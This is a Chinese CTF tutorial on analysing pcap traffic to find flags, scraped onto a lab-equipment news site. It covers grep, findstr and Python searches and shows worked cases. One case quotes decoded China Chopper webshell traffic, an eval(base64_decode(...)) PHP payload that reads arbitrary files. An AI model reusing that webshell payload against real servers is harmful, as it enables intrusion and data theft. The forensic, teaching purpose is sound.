CTF之流量分析

2024-07-10 01:32:23| 来源: 网络整理| 查看: 265

CTF杂项中存在一种题型——流量分析，主要是给你一个流量包，让你分析获取其中的flag的值。

有5种方式，可以直接查找flag。

1、直接搜索

2、使用notepad++等软件，直接打开流量包，搜索关键字

3、编写python脚本

#encoding:utf-8 #用二进制方式读取文件 file=open("networking.pcap","rb") #读取文件内容 i=file.read() #查找字段 a1=i.find("flag{") a2=i.find("}",a1) #将查找的字段，组合起来 a3=i[a1:a2+1] print a3

4、windows cmd命令

type networking.pcap | findstr "flag"

5、linux string 命令

strings networking.pcap | grep flag

实战

案例一：

案例二：

使用wireshare打开pcap包，显示tcp流

好像已经找到了密码，但是有点不对劲，hex dump一下看看。

7f对应的ascII码是DEL，是删除，0D代表的是回车。

因此flag是backdoor00Rm8ate

案例三：简单文件提取

wireshark读取pcap包，追踪TCP流，

将post请求，进行url及base64解码，发现好像是菜刀客户端流量，使用菜刀客户端下载了x.tar.gz文件。

ISG2014= @eval(base64_decode($_POST[z0])); &z0=@ini_set("display_errors","0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo("->|"); ;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"]; $fp=@fopen($F,"r"); if(@fgetc($fp)){@fclose($fp);@readfile($F); } else { echo("ERROR:// Can Not Read"); }; echo("|

【本文地址】

公司简介

联系我们

今日新闻

点击排行

实验室常用的仪器、试剂和: 说到实验室常用到的东西，主要就分为仪器、试剂和耗

不用再找了，全球10大实验: 01、赛默飞世尔科技（热电）Thermo Fisher Scientif

三代水柜的量产巅峰T-72坦: 作者：寞寒最近，西边闹腾挺大，本来小寞以为忙完这

通风柜跟实验室通风系统有: 说到通风柜跟实验室通风，不少人都纠结二者到底是不

集消毒杀菌、烘干收纳为一: 厨房是家里细菌较多的地方，潮湿的环境、没有完全密

实验室设备之全钢实验台如: 全钢实验台是实验室家具中较为重要的家具之一，很多

图片新闻

实验室药品柜的特性有哪些: 实验室药品柜是实验室家具的重要组成部分之一，主要

小学科学实验中有哪些教学: 计算机计算器一般打孔器打气筒仪器车显微镜

实验室各种仪器原理动图讲: 1.紫外分光光谱UV分析原理：吸收紫外光能量，引起分

高中化学常见仪器及实验装: 1、可加热仪器：2、计量仪器：（1）仪器A的名称：量

微生物操作主要设备和器具: 今天盘点一下微生物操作主要设备和器具，别嫌我啰嗦

浅谈通风柜使用基本常识: 　众所周知，通风柜功能中最主要的就是排气功能。在

CTF之流量分析

CTF之流量分析

今日新闻

点击排行

推荐新闻

图片新闻

专题文章